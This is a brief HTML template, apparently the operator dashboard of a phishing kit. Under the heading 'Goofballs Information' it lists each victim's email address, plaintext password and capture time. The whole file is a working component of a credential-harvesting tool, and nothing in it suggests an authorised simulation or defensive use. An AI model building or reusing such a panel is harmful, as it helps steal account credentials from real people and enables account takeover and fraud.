<!DOCTYPE html>
<html>
<head>
    <title>Phishing Results</title>
</head>
<body>
    <h2>Goofballs Information</h2>

    <a href='logout'>logout</a><br><br>
    <table border='1'>
        <tr>
            <th>Email</th>
            <th>Password</th>
            <th>Timestamp</th>
        </tr>
        {% for victim in victims %}
        <tr>
            <td>{{ victim.email }}</td>
            <td>{{ victim.password }}</td>
            <td>{{ victim.timestamp }}</td>
        </tr>
        {% endfor %}
    </table>
</body>
</html>